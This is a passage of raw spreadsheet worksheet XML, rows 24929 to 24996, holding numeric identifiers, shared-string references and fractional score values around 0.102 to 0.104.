      <c r="D24929" s="2">
        <v>1.0</v>
      </c>
      <c r="E24929" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24929" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="24930" ht="15.75" customHeight="1">
      <c r="A24930" s="1">
        <v>32515.0</v>
      </c>
      <c r="B24930" s="2">
        <v>5716647.0</v>
      </c>
      <c r="C24930" s="2" t="s">
        <v>23995</v>
      </c>
      <c r="D24930" s="2">
        <v>1.0</v>
      </c>
      <c r="E24930" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24930" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="24931" ht="15.75" customHeight="1">
      <c r="A24931" s="1">
        <v>34017.0</v>
      </c>
      <c r="B24931" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C24931" s="2" t="s">
        <v>23996</v>
      </c>
      <c r="D24931" s="2">
        <v>1.0</v>
      </c>
      <c r="E24931" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24931" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="24932" ht="15.75" customHeight="1">
      <c r="A24932" s="1">
        <v>7890.0</v>
      </c>
      <c r="B24932" s="2">
        <v>5.2442677E7</v>
      </c>
      <c r="C24932" s="2" t="s">
        <v>23997</v>
      </c>
      <c r="D24932" s="2">
        <v>1.0</v>
      </c>
      <c r="E24932" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24932" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24933" ht="15.75" customHeight="1">
      <c r="A24933" s="1">
        <v>11602.0</v>
      </c>
      <c r="B24933" s="2">
        <v>2.2980816E7</v>
      </c>
      <c r="C24933" s="2" t="s">
        <v>23998</v>
      </c>
      <c r="D24933" s="2">
        <v>1.0</v>
      </c>
      <c r="E24933" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24933" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24934" ht="15.75" customHeight="1">
      <c r="A24934" s="1">
        <v>17657.0</v>
      </c>
      <c r="B24934" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C24934" s="2" t="s">
        <v>23999</v>
      </c>
      <c r="D24934" s="2">
        <v>1.0</v>
      </c>
      <c r="E24934" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24934" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24935" ht="15.75" customHeight="1">
      <c r="A24935" s="1">
        <v>20171.0</v>
      </c>
      <c r="B24935" s="2">
        <v>1.0415667E7</v>
      </c>
      <c r="C24935" s="2" t="s">
        <v>23944</v>
      </c>
      <c r="D24935" s="2">
        <v>1.0</v>
      </c>
      <c r="E24935" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24935" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24936" ht="15.75" customHeight="1">
      <c r="A24936" s="1">
        <v>30585.0</v>
      </c>
      <c r="B24936" s="2">
        <v>4118261.0</v>
      </c>
      <c r="C24936" s="2" t="s">
        <v>24000</v>
      </c>
      <c r="D24936" s="2">
        <v>1.0</v>
      </c>
      <c r="E24936" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24936" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24937" ht="15.75" customHeight="1">
      <c r="A24937" s="1">
        <v>30773.0</v>
      </c>
      <c r="B24937" s="2">
        <v>4.4633754E7</v>
      </c>
      <c r="C24937" s="2" t="s">
        <v>23941</v>
      </c>
      <c r="D24937" s="2">
        <v>1.0</v>
      </c>
      <c r="E24937" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24937" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24938" ht="15.75" customHeight="1">
      <c r="A24938" s="1">
        <v>31519.0</v>
      </c>
      <c r="B24938" s="2">
        <v>5.0807462E7</v>
      </c>
      <c r="C24938" s="2" t="s">
        <v>24001</v>
      </c>
      <c r="D24938" s="2">
        <v>1.0</v>
      </c>
      <c r="E24938" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24938" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24939" ht="15.75" customHeight="1">
      <c r="A24939" s="1">
        <v>31782.0</v>
      </c>
      <c r="B24939" s="2">
        <v>5.2254505E7</v>
      </c>
      <c r="C24939" s="2" t="s">
        <v>24002</v>
      </c>
      <c r="D24939" s="2">
        <v>1.0</v>
      </c>
      <c r="E24939" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24939" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24940" ht="15.75" customHeight="1">
      <c r="A24940" s="1">
        <v>32782.0</v>
      </c>
      <c r="B24940" s="2">
        <v>6130524.0</v>
      </c>
      <c r="C24940" s="2" t="s">
        <v>24003</v>
      </c>
      <c r="D24940" s="2">
        <v>1.0</v>
      </c>
      <c r="E24940" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24940" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="24941" ht="15.75" customHeight="1">
      <c r="A24941" s="1">
        <v>3000.0</v>
      </c>
      <c r="B24941" s="2">
        <v>3.6293039E7</v>
      </c>
      <c r="C24941" s="2" t="s">
        <v>24004</v>
      </c>
      <c r="D24941" s="2">
        <v>1.0</v>
      </c>
      <c r="E24941" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24941" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24942" ht="15.75" customHeight="1">
      <c r="A24942" s="1">
        <v>12973.0</v>
      </c>
      <c r="B24942" s="2">
        <v>3.2586091E7</v>
      </c>
      <c r="C24942" s="2" t="s">
        <v>24005</v>
      </c>
      <c r="D24942" s="2">
        <v>1.0</v>
      </c>
      <c r="E24942" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24942" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24943" ht="15.75" customHeight="1">
      <c r="A24943" s="1">
        <v>13685.0</v>
      </c>
      <c r="B24943" s="2">
        <v>3.6093867E7</v>
      </c>
      <c r="C24943" s="2" t="s">
        <v>24006</v>
      </c>
      <c r="D24943" s="2">
        <v>1.0</v>
      </c>
      <c r="E24943" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24943" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24944" ht="15.75" customHeight="1">
      <c r="A24944" s="1">
        <v>17515.0</v>
      </c>
      <c r="B24944" s="2">
        <v>5.0032609E7</v>
      </c>
      <c r="C24944" s="2" t="s">
        <v>24007</v>
      </c>
      <c r="D24944" s="2">
        <v>1.0</v>
      </c>
      <c r="E24944" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24944" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24945" ht="15.75" customHeight="1">
      <c r="A24945" s="1">
        <v>18719.0</v>
      </c>
      <c r="B24945" s="2">
        <v>5.3669348E7</v>
      </c>
      <c r="C24945" s="2" t="s">
        <v>24008</v>
      </c>
      <c r="D24945" s="2">
        <v>1.0</v>
      </c>
      <c r="E24945" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24945" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24946" ht="15.75" customHeight="1">
      <c r="A24946" s="1">
        <v>20237.0</v>
      </c>
      <c r="B24946" s="2">
        <v>1.0856037E7</v>
      </c>
      <c r="C24946" s="2" t="s">
        <v>24009</v>
      </c>
      <c r="D24946" s="2">
        <v>1.0</v>
      </c>
      <c r="E24946" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24946" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24947" ht="15.75" customHeight="1">
      <c r="A24947" s="1">
        <v>24415.0</v>
      </c>
      <c r="B24947" s="2">
        <v>1.0835956E7</v>
      </c>
      <c r="C24947" s="2" t="s">
        <v>24010</v>
      </c>
      <c r="D24947" s="2">
        <v>1.0</v>
      </c>
      <c r="E24947" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24947" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24948" ht="15.75" customHeight="1">
      <c r="A24948" s="1">
        <v>31208.0</v>
      </c>
      <c r="B24948" s="2">
        <v>4923901.0</v>
      </c>
      <c r="C24948" s="2" t="s">
        <v>23951</v>
      </c>
      <c r="D24948" s="2">
        <v>1.0</v>
      </c>
      <c r="E24948" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24948" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24949" ht="15.75" customHeight="1">
      <c r="A24949" s="1">
        <v>31529.0</v>
      </c>
      <c r="B24949" s="2">
        <v>5.090367E7</v>
      </c>
      <c r="C24949" s="2" t="s">
        <v>23558</v>
      </c>
      <c r="D24949" s="2">
        <v>1.0</v>
      </c>
      <c r="E24949" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24949" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="24950" ht="15.75" customHeight="1">
      <c r="A24950" s="1">
        <v>489.0</v>
      </c>
      <c r="B24950" s="2">
        <v>1.7583295E7</v>
      </c>
      <c r="C24950" s="2" t="s">
        <v>24011</v>
      </c>
      <c r="D24950" s="2">
        <v>1.0</v>
      </c>
      <c r="E24950" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24950" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24951" ht="15.75" customHeight="1">
      <c r="A24951" s="1">
        <v>10116.0</v>
      </c>
      <c r="B24951" s="2">
        <v>5.7253379E7</v>
      </c>
      <c r="C24951" s="2" t="s">
        <v>24012</v>
      </c>
      <c r="D24951" s="2">
        <v>1.0</v>
      </c>
      <c r="E24951" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24951" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24952" ht="15.75" customHeight="1">
      <c r="A24952" s="1">
        <v>21017.0</v>
      </c>
      <c r="B24952" s="2">
        <v>1.7382869E7</v>
      </c>
      <c r="C24952" s="2" t="s">
        <v>24013</v>
      </c>
      <c r="D24952" s="2">
        <v>1.0</v>
      </c>
      <c r="E24952" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24952" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24953" ht="15.75" customHeight="1">
      <c r="A24953" s="1">
        <v>23018.0</v>
      </c>
      <c r="B24953" s="2">
        <v>4.9936727E7</v>
      </c>
      <c r="C24953" s="2" t="s">
        <v>24014</v>
      </c>
      <c r="D24953" s="2">
        <v>1.0</v>
      </c>
      <c r="E24953" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24953" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24954" ht="15.75" customHeight="1">
      <c r="A24954" s="1">
        <v>23881.0</v>
      </c>
      <c r="B24954" s="2">
        <v>8381167.0</v>
      </c>
      <c r="C24954" s="2" t="s">
        <v>23801</v>
      </c>
      <c r="D24954" s="2">
        <v>1.0</v>
      </c>
      <c r="E24954" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24954" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24955" ht="15.75" customHeight="1">
      <c r="A24955" s="1">
        <v>25819.0</v>
      </c>
      <c r="B24955" s="2">
        <v>1.4769431E7</v>
      </c>
      <c r="C24955" s="2" t="s">
        <v>23549</v>
      </c>
      <c r="D24955" s="2">
        <v>1.0</v>
      </c>
      <c r="E24955" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24955" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24956" ht="15.75" customHeight="1">
      <c r="A24956" s="1">
        <v>26060.0</v>
      </c>
      <c r="B24956" s="2">
        <v>1.5535828E7</v>
      </c>
      <c r="C24956" s="2" t="s">
        <v>24015</v>
      </c>
      <c r="D24956" s="2">
        <v>1.0</v>
      </c>
      <c r="E24956" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24956" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24957" ht="15.75" customHeight="1">
      <c r="A24957" s="1">
        <v>26467.0</v>
      </c>
      <c r="B24957" s="2">
        <v>1.7382868E7</v>
      </c>
      <c r="C24957" s="2" t="s">
        <v>24013</v>
      </c>
      <c r="D24957" s="2">
        <v>1.0</v>
      </c>
      <c r="E24957" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24957" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="24958" ht="15.75" customHeight="1">
      <c r="A24958" s="1">
        <v>8369.0</v>
      </c>
      <c r="B24958" s="2">
        <v>5.3799142E7</v>
      </c>
      <c r="C24958" s="2" t="s">
        <v>24016</v>
      </c>
      <c r="D24958" s="2">
        <v>1.0</v>
      </c>
      <c r="E24958" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24958" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="24959" ht="15.75" customHeight="1">
      <c r="A24959" s="1">
        <v>30983.0</v>
      </c>
      <c r="B24959" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C24959" s="2" t="s">
        <v>24017</v>
      </c>
      <c r="D24959" s="2">
        <v>1.0</v>
      </c>
      <c r="E24959" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24959" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="24960" ht="15.75" customHeight="1">
      <c r="A24960" s="1">
        <v>33277.0</v>
      </c>
      <c r="B24960" s="2">
        <v>7424751.0</v>
      </c>
      <c r="C24960" s="2" t="s">
        <v>24018</v>
      </c>
      <c r="D24960" s="2">
        <v>1.0</v>
      </c>
      <c r="E24960" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24960" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="24961" ht="15.75" customHeight="1">
      <c r="A24961" s="1">
        <v>32932.0</v>
      </c>
      <c r="B24961" s="2">
        <v>6433433.0</v>
      </c>
      <c r="C24961" s="2" t="s">
        <v>24019</v>
      </c>
      <c r="D24961" s="2">
        <v>1.0</v>
      </c>
      <c r="E24961" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24961" s="2">
        <v>0.1032986111111111</v>
      </c>
    </row>
    <row r="24962" ht="15.75" customHeight="1">
      <c r="A24962" s="1">
        <v>28394.0</v>
      </c>
      <c r="B24962" s="2">
        <v>2.6235246E7</v>
      </c>
      <c r="C24962" s="2" t="s">
        <v>24020</v>
      </c>
      <c r="D24962" s="2">
        <v>1.0</v>
      </c>
      <c r="E24962" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24962" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="24963" ht="15.75" customHeight="1">
      <c r="A24963" s="1">
        <v>30925.0</v>
      </c>
      <c r="B24963" s="2">
        <v>4701060.0</v>
      </c>
      <c r="C24963" s="2" t="s">
        <v>24021</v>
      </c>
      <c r="D24963" s="2">
        <v>1.0</v>
      </c>
      <c r="E24963" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24963" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="24964" ht="15.75" customHeight="1">
      <c r="A24964" s="1">
        <v>31327.0</v>
      </c>
      <c r="B24964" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C24964" s="2" t="s">
        <v>24022</v>
      </c>
      <c r="D24964" s="2">
        <v>1.0</v>
      </c>
      <c r="E24964" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24964" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="24965" ht="15.75" customHeight="1">
      <c r="A24965" s="1">
        <v>6373.0</v>
      </c>
      <c r="B24965" s="2">
        <v>4.8382842E7</v>
      </c>
      <c r="C24965" s="2" t="s">
        <v>24023</v>
      </c>
      <c r="D24965" s="2">
        <v>1.0</v>
      </c>
      <c r="E24965" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24965" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="24966" ht="15.75" customHeight="1">
      <c r="A24966" s="1">
        <v>19760.0</v>
      </c>
      <c r="B24966" s="2">
        <v>5.6717237E7</v>
      </c>
      <c r="C24966" s="2" t="s">
        <v>24024</v>
      </c>
      <c r="D24966" s="2">
        <v>1.0</v>
      </c>
      <c r="E24966" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24966" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="24967" ht="15.75" customHeight="1">
      <c r="A24967" s="1">
        <v>30356.0</v>
      </c>
      <c r="B24967" s="2">
        <v>3.8261429E7</v>
      </c>
      <c r="C24967" s="2" t="s">
        <v>24025</v>
      </c>
      <c r="D24967" s="2">
        <v>1.0</v>
      </c>
      <c r="E24967" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24967" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="24968" ht="15.75" customHeight="1">
      <c r="A24968" s="1">
        <v>3346.0</v>
      </c>
      <c r="B24968" s="2">
        <v>3.7753689E7</v>
      </c>
      <c r="C24968" s="2" t="s">
        <v>24026</v>
      </c>
      <c r="D24968" s="2">
        <v>1.0</v>
      </c>
      <c r="E24968" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24968" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="24969" ht="15.75" customHeight="1">
      <c r="A24969" s="1">
        <v>5758.0</v>
      </c>
      <c r="B24969" s="2">
        <v>4.6668384E7</v>
      </c>
      <c r="C24969" s="2" t="s">
        <v>24027</v>
      </c>
      <c r="D24969" s="2">
        <v>1.0</v>
      </c>
      <c r="E24969" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24969" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="24970" ht="15.75" customHeight="1">
      <c r="A24970" s="1">
        <v>24556.0</v>
      </c>
      <c r="B24970" s="2">
        <v>1.129452E7</v>
      </c>
      <c r="C24970" s="2" t="s">
        <v>24028</v>
      </c>
      <c r="D24970" s="2">
        <v>1.0</v>
      </c>
      <c r="E24970" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24970" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="24971" ht="15.75" customHeight="1">
      <c r="A24971" s="1">
        <v>9311.0</v>
      </c>
      <c r="B24971" s="2">
        <v>5.5575277E7</v>
      </c>
      <c r="C24971" s="2" t="s">
        <v>24029</v>
      </c>
      <c r="D24971" s="2">
        <v>1.0</v>
      </c>
      <c r="E24971" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24971" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24972" ht="15.75" customHeight="1">
      <c r="A24972" s="1">
        <v>9643.0</v>
      </c>
      <c r="B24972" s="2">
        <v>5.6242752E7</v>
      </c>
      <c r="C24972" s="2" t="s">
        <v>24030</v>
      </c>
      <c r="D24972" s="2">
        <v>1.0</v>
      </c>
      <c r="E24972" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24972" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24973" ht="15.75" customHeight="1">
      <c r="A24973" s="1">
        <v>13979.0</v>
      </c>
      <c r="B24973" s="2">
        <v>3.7345123E7</v>
      </c>
      <c r="C24973" s="2" t="s">
        <v>24031</v>
      </c>
      <c r="D24973" s="2">
        <v>1.0</v>
      </c>
      <c r="E24973" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24973" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24974" ht="15.75" customHeight="1">
      <c r="A24974" s="1">
        <v>16376.0</v>
      </c>
      <c r="B24974" s="2">
        <v>4.6187655E7</v>
      </c>
      <c r="C24974" s="2" t="s">
        <v>24032</v>
      </c>
      <c r="D24974" s="2">
        <v>1.0</v>
      </c>
      <c r="E24974" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24974" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24975" ht="15.75" customHeight="1">
      <c r="A24975" s="1">
        <v>24804.0</v>
      </c>
      <c r="B24975" s="2">
        <v>1.2030552E7</v>
      </c>
      <c r="C24975" s="2" t="s">
        <v>24033</v>
      </c>
      <c r="D24975" s="2">
        <v>1.0</v>
      </c>
      <c r="E24975" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24975" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24976" ht="15.75" customHeight="1">
      <c r="A24976" s="1">
        <v>25091.0</v>
      </c>
      <c r="B24976" s="2">
        <v>1.2904473E7</v>
      </c>
      <c r="C24976" s="2" t="s">
        <v>24034</v>
      </c>
      <c r="D24976" s="2">
        <v>1.0</v>
      </c>
      <c r="E24976" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24976" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24977" ht="15.75" customHeight="1">
      <c r="A24977" s="1">
        <v>30032.0</v>
      </c>
      <c r="B24977" s="2">
        <v>3617998.0</v>
      </c>
      <c r="C24977" s="2" t="s">
        <v>24035</v>
      </c>
      <c r="D24977" s="2">
        <v>1.0</v>
      </c>
      <c r="E24977" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24977" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24978" ht="15.75" customHeight="1">
      <c r="A24978" s="1">
        <v>31122.0</v>
      </c>
      <c r="B24978" s="2">
        <v>4.885145E7</v>
      </c>
      <c r="C24978" s="2" t="s">
        <v>23921</v>
      </c>
      <c r="D24978" s="2">
        <v>1.0</v>
      </c>
      <c r="E24978" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24978" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="24979" ht="15.75" customHeight="1">
      <c r="A24979" s="1">
        <v>3837.0</v>
      </c>
      <c r="B24979" s="2">
        <v>4.0204367E7</v>
      </c>
      <c r="C24979" s="2" t="s">
        <v>24036</v>
      </c>
      <c r="D24979" s="2">
        <v>1.0</v>
      </c>
      <c r="E24979" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24979" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24980" ht="15.75" customHeight="1">
      <c r="A24980" s="1">
        <v>12707.0</v>
      </c>
      <c r="B24980" s="2">
        <v>3.0825553E7</v>
      </c>
      <c r="C24980" s="2" t="s">
        <v>24037</v>
      </c>
      <c r="D24980" s="2">
        <v>1.0</v>
      </c>
      <c r="E24980" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24980" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24981" ht="15.75" customHeight="1">
      <c r="A24981" s="1">
        <v>17275.0</v>
      </c>
      <c r="B24981" s="2">
        <v>4.9188099E7</v>
      </c>
      <c r="C24981" s="2" t="s">
        <v>24038</v>
      </c>
      <c r="D24981" s="2">
        <v>1.0</v>
      </c>
      <c r="E24981" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24981" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24982" ht="15.75" customHeight="1">
      <c r="A24982" s="1">
        <v>26462.0</v>
      </c>
      <c r="B24982" s="2">
        <v>1.732779E7</v>
      </c>
      <c r="C24982" s="2" t="s">
        <v>24039</v>
      </c>
      <c r="D24982" s="2">
        <v>1.0</v>
      </c>
      <c r="E24982" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24982" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24983" ht="15.75" customHeight="1">
      <c r="A24983" s="1">
        <v>26998.0</v>
      </c>
      <c r="B24983" s="2">
        <v>1.9851306E7</v>
      </c>
      <c r="C24983" s="2" t="s">
        <v>24040</v>
      </c>
      <c r="D24983" s="2">
        <v>1.0</v>
      </c>
      <c r="E24983" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24983" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24984" ht="15.75" customHeight="1">
      <c r="A24984" s="1">
        <v>28711.0</v>
      </c>
      <c r="B24984" s="2">
        <v>2.7804168E7</v>
      </c>
      <c r="C24984" s="2" t="s">
        <v>24041</v>
      </c>
      <c r="D24984" s="2">
        <v>1.0</v>
      </c>
      <c r="E24984" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24984" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24985" ht="15.75" customHeight="1">
      <c r="A24985" s="1">
        <v>31537.0</v>
      </c>
      <c r="B24985" s="2">
        <v>5095178.0</v>
      </c>
      <c r="C24985" s="2" t="s">
        <v>24042</v>
      </c>
      <c r="D24985" s="2">
        <v>1.0</v>
      </c>
      <c r="E24985" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24985" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="24986" ht="15.75" customHeight="1">
      <c r="A24986" s="1">
        <v>5173.0</v>
      </c>
      <c r="B24986" s="2">
        <v>4.4751794E7</v>
      </c>
      <c r="C24986" s="2" t="s">
        <v>24043</v>
      </c>
      <c r="D24986" s="2">
        <v>1.0</v>
      </c>
      <c r="E24986" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24986" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24987" ht="15.75" customHeight="1">
      <c r="A24987" s="1">
        <v>9550.0</v>
      </c>
      <c r="B24987" s="2">
        <v>5.6032641E7</v>
      </c>
      <c r="C24987" s="2" t="s">
        <v>24044</v>
      </c>
      <c r="D24987" s="2">
        <v>1.0</v>
      </c>
      <c r="E24987" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24987" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24988" ht="15.75" customHeight="1">
      <c r="A24988" s="1">
        <v>15067.0</v>
      </c>
      <c r="B24988" s="2">
        <v>4.1711903E7</v>
      </c>
      <c r="C24988" s="2" t="s">
        <v>24045</v>
      </c>
      <c r="D24988" s="2">
        <v>1.0</v>
      </c>
      <c r="E24988" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24988" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24989" ht="15.75" customHeight="1">
      <c r="A24989" s="1">
        <v>15191.0</v>
      </c>
      <c r="B24989" s="2">
        <v>4.2045252E7</v>
      </c>
      <c r="C24989" s="2" t="s">
        <v>24046</v>
      </c>
      <c r="D24989" s="2">
        <v>1.0</v>
      </c>
      <c r="E24989" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24989" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24990" ht="15.75" customHeight="1">
      <c r="A24990" s="1">
        <v>16491.0</v>
      </c>
      <c r="B24990" s="2">
        <v>4.655647E7</v>
      </c>
      <c r="C24990" s="2" t="s">
        <v>24047</v>
      </c>
      <c r="D24990" s="2">
        <v>1.0</v>
      </c>
      <c r="E24990" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24990" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24991" ht="15.75" customHeight="1">
      <c r="A24991" s="1">
        <v>22112.0</v>
      </c>
      <c r="B24991" s="2">
        <v>3.0975735E7</v>
      </c>
      <c r="C24991" s="2" t="s">
        <v>24048</v>
      </c>
      <c r="D24991" s="2">
        <v>1.0</v>
      </c>
      <c r="E24991" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24991" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24992" ht="15.75" customHeight="1">
      <c r="A24992" s="1">
        <v>23131.0</v>
      </c>
      <c r="B24992" s="2">
        <v>5.142026E7</v>
      </c>
      <c r="C24992" s="2" t="s">
        <v>24049</v>
      </c>
      <c r="D24992" s="2">
        <v>1.0</v>
      </c>
      <c r="E24992" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24992" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24993" ht="15.75" customHeight="1">
      <c r="A24993" s="1">
        <v>27160.0</v>
      </c>
      <c r="B24993" s="2">
        <v>2.0809486E7</v>
      </c>
      <c r="C24993" s="2" t="s">
        <v>24050</v>
      </c>
      <c r="D24993" s="2">
        <v>1.0</v>
      </c>
      <c r="E24993" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24993" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24994" ht="15.75" customHeight="1">
      <c r="A24994" s="1">
        <v>29513.0</v>
      </c>
      <c r="B24994" s="2">
        <v>3.2761921E7</v>
      </c>
      <c r="C24994" s="2" t="s">
        <v>24051</v>
      </c>
      <c r="D24994" s="2">
        <v>1.0</v>
      </c>
      <c r="E24994" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24994" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24995" ht="15.75" customHeight="1">
      <c r="A24995" s="1">
        <v>30097.0</v>
      </c>
      <c r="B24995" s="2">
        <v>3.6451964E7</v>
      </c>
      <c r="C24995" s="2" t="s">
        <v>24052</v>
      </c>
      <c r="D24995" s="2">
        <v>1.0</v>
      </c>
      <c r="E24995" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24995" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24996" ht="15.75" customHeight="1">
      <c r="A24996" s="1">
        <v>30893.0</v>
      </c>
      <c r="B24996" s="2">
        <v>4657390.0</v>
      </c>
      <c r="C24996" s="2" t="s">
        <v>24053</v>
      </c>
      <c r="D24996" s="2">
        <v>1.0</v>
      </c>
